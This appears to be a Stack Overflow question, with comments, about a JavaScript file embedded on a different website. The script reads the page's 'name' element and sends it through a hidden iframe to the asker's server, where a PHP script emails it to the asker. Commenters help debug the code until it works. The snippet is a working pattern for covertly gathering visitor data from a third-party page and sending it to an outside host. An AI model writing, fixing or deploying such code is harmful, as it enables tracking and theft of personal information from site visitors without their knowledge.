# iframe is not loading

Tags: javascript, iframe, getelementbyid, createelement

I've been looking at this piece of code for the past hour. What is wrong with this code?

Contents of: http://mywesbite.com/myscript.js

```
var ifr = document.createElement("iframe");
var user = document.getElementById("name").innerHTML;
ifr.src = "http://mywebsite.com/script.php?given_name=" + user;
ifr.style.visibility = "hidden";
document.body.appendChild(ifr);
```

---

Contents of: http://mywebsite.com/script.php

```
<?php
$username = $_GET['given_name'];
mail("myemail@mywebsite.com", "Someone visited your site!", "Name: ".$username);
?>
```

---

I have my javascript embedded on a different website. It extracts the `name` element. How I embeded my javascript:

```
<script type="text/javascript" src="http://mywesbite.com/myscript.js"></script>
```

Even if the `name` extraction fails, it should still visit my website with an empty string. However, it doesn't visit my website at all as I am not getting any emails. However, if I just visit http://mywebsite.com/script.php it sends me any email (just the `$username` is empty. So its not my `script.php`. The javascript is not working.

Comment: Do you have any errors about js in your console of browser?

Comment: Try adding iframe to the DOM, then set `src` attribute via `setAttribute` method.

Comment: Where is your script tag at? If it is in the head it won't work as the `<body>` element isn't ready yet and you could be getting an error about trying to use appendChild on null

Comment: thank you @BendyZhang I fixed it now. I didn't know there was a console for a browser

Comment: You may and should answer your own question (and accept it 2 days later) for people running into a similar problem.